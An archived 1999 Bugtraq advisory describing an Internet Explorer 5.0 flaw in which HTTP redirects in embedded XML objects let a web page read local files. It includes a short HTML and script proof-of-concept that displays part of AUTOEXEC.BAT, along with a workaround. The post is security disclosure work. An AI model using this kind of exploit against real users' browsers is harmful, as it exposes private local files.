[12675] in bugtraq

home help back first fref pref prev next nref lref last post

IE 5.0 XML HTTP redirect problems

daemon@ATHENA.MIT.EDU (Georgi Guninski)
Mon Nov 22 14:20:37 1999

Mime-Version: 1.0
Content-Type: text/plain; charset=koi8-r
Content-Transfer-Encoding: 7bit
Message-Id:  <38395F92.A77942B9@nat.bg>
Date:         Mon, 22 Nov 1999 17:21:54 +0200
Reply-To: Georgi Guninski <joro@NAT.BG>
From: Georgi Guninski <joro@NAT.BG>
X-To:         Bugtraq <BUGTRAQ@SECURITYFOCUS.COM>
To: BUGTRAQ@SECURITYFOCUS.COM

Disclaimer:
The opinions expressed in this advisory and program are my own and not
of any company.
The usual standard disclaimer applies, especially the fact that Georgi
Guninski is not liable for any damages caused by direct or  indirect use
of the information or functionality provided by this program.
Georgi Guninski, bears NO responsibility for content or misuse of this
program or any derivatives thereof.

Description:

Internet Explorer 5.0 under Windows 95 and WinNT 4.0 (guess other
versions are affected) has security problems with HTTP redirects in XML
objects. This allows at least:
1) Reading any (local or nonlocal) XML file and any wellformed
documents. With the growing influence of XML I consider this a serious
problem.
2) Reading parts of documents
3) Checking for the existence of local files.
I suppose reading of arbitrary files (not just XML) is also possible,
but do not have the time to explore.

Details:

When one embeds a XML document in a HTML document IE 5.0 does not handle
properly HTTP redirects
and allows access to the DOM of the embeded XML document.

The code is:
----------------------------------------------------------------------------------------
<object id="xm" type="text/xml"
data="http://www.nat.bg/~joro/reject.cgi?autoexec" width=400 height=200>
</object>
<SCRIPT>
function  f()
{
s=xm.body.innerHTML;
a=window.open();
//alert(s);
a.document.open();
a.document.write("Here is a part of AUTOEXEC.BAT (the error message is
normal):<BR>"+s);
a.document.close();
}
setTimeout("f()",5000);
</SCRIPT>
----------------------------------------------------------------------------------------


Workaround:
Disable Active Scripting or Disable Script ActiveX Controls marked Safe
for Scripting

Demonstration is available at http://www.nat.bg/~joro/xmln.html

Copyright 1999 Georgi Guninski

Regards,
Georgi Guninski
http://www.nat.bg/~joro

home help back first fref pref prev next nref lref last post